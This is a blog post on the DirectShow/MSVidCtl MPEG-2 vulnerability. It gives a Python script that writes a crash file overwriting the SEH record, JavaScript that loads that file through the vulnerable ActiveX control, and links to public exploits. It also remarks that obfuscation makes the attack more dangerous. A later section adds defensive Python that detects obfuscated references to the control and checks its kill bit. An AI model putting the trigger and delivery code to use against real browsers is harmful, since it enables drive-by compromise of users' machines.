10 Jul
Microsoft DirectShow and MPEG-2 Exploitation
Hello, we are really sorry for the long gap between updates.
We have been busy, but I have some good news that I will share with you soon. For now I want to talk briefly about the new DirectShow vulnerabilities; one of them is more fun and has been exploited in the wild over the past days, and the exploit is now publicly available.
Anyway, here is the original advisory (another good vulnerability from Alex Wheeler):
http://www.microsoft.com/technet/security/advisory/972890.mspx
This vulnerability can be exploited using various browser exploitation methods such as heap spraying.
The following simple script writes a file that triggers the vulnerability:
#!/usr/bin/python
# Builds a minimal malformed MPEG-2 stream, saved under a .gif name, whose
# parsing by the vulnerable control overwrites the SEH record.
# Byte literals so the script runs under both Python 2 and Python 3.
gif = b"\x00\x03\x00\x00\x11\x20\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
gif += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
gif += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
gif += b"\xFF\xFF\xFF\xFF"  # End of SEH chain
gif += b"\x41\x41\x41\x41"  # SE Handler
gif += b"\x00"
fp = open("directshow.gif", "wb")
fp.write(gif)
fp.close()
// DivID is a container element already present in the page (assumed here).
var myObject = document.createElement('object');
DivID.appendChild(myObject);
myObject.width = '1';
myObject.height = '1';
myObject.data = 'directshow.gif';  // the file written by the script above
// Vulnerable ID
myObject.classid = 'clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
Here you can see the overwritten SEH:
And here you can see the sprayed heap:
Finally, as you can see here, we got a shell:
Using methods like JavaScript obfuscation and shrinking variables can make this exploit more dangerous. You can find this exploit at:
http://trac.metasploit.com/browser/framework3/trunk/modules/exploits/windows/browser/msvidctl_mpeg2.rb
and:
http://milw0rm.com/exploits/9108
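As an added defensive example (my own code, not from the original post or the Metasploit module), the following Python checks page or script content for references to the MSVidCtl CLSID used in the object snippet above, normalizing the \xNN, \uNNNN and %NN escapes and string concatenation that the JavaScript obfuscation mentioned above typically introduces, and on Windows reads whether the advisory's kill bit (Compatibility Flags 0x400) is set for that control. The registry path and flag value are Microsoft's documented kill-bit mechanism; the function names and the sample strings are my own.

```python
import re

# CLSID of the MSVidCtl control instantiated by the object snippet above.
MSVIDCTL_CLSID = "0955AC62-BF2E-4CBA-A2B9-A63F772D46CF"
_CLSID_HEX = MSVIDCTL_CLSID.replace("-", "").lower()

# Escapes that obfuscated script commonly uses to hide string constants.
_ESC = re.compile(r"\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")

def _unescape(text):
    """Decode one layer of \\xNN, \\uNNNN and %NN escapes."""
    return _ESC.sub(lambda m: chr(int([g for g in m.groups() if g][0], 16)), text)

def normalize(text):
    """Peel nested escape layers, then keep only hex digits so that quoting,
    concatenation ('09' + '55AC62-...'), braces and hyphens cannot split the CLSID."""
    prev = None
    while prev != text:  # each pass shrinks the text, so this terminates
        prev, text = text, _unescape(text)
    return re.sub(r"[^0-9a-fA-F]", "", text).lower()

def references_msvidctl(text):
    """True if the (possibly obfuscated) HTML/JS text names the MSVidCtl CLSID."""
    return _CLSID_HEX in normalize(text)

# Kill-bit location documented by Microsoft: Compatibility Flags 0x400 under this
# key stops Internet Explorer from instantiating the control.
KILLBIT_KEY = (r"SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility"
               r"\{" + MSVIDCTL_CLSID + "}")
KILL_BIT = 0x00000400

def msvidctl_killbit_set():
    """True/False on Windows; None on other platforms (no registry to read)."""
    try:
        import winreg
    except ImportError:
        return None
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, KILLBIT_KEY) as key:
            flags, _ = winreg.QueryValueEx(key, "Compatibility Flags")
    except OSError:
        return False  # key or value absent: no kill bit for this control
    return bool(flags & KILL_BIT)

# Constructed samples: the post's snippet, an escaped and concatenated variant,
# and a benign control that must not match.
SAMPLE_PLAIN = "myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';"
SAMPLE_OBFUSCATED = "o.classid=unescape('%63lsid:\\x30\\x39'+'55AC62-BF2E-4CBA-'+'A2B9-A63F772D46CF');"
SAMPLE_BENIGN = "<object classid='clsid:D27CDB6E-AE6D-11cf-96B8-444553540000'></object>"
```

Run `references_msvidctl` over captured page or script content; `msvidctl_killbit_set` only yields a verdict on Windows hosts.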
Happy Hunting.
PS: I will try to have a more technical post as soon as possible.
Cheers.
shahin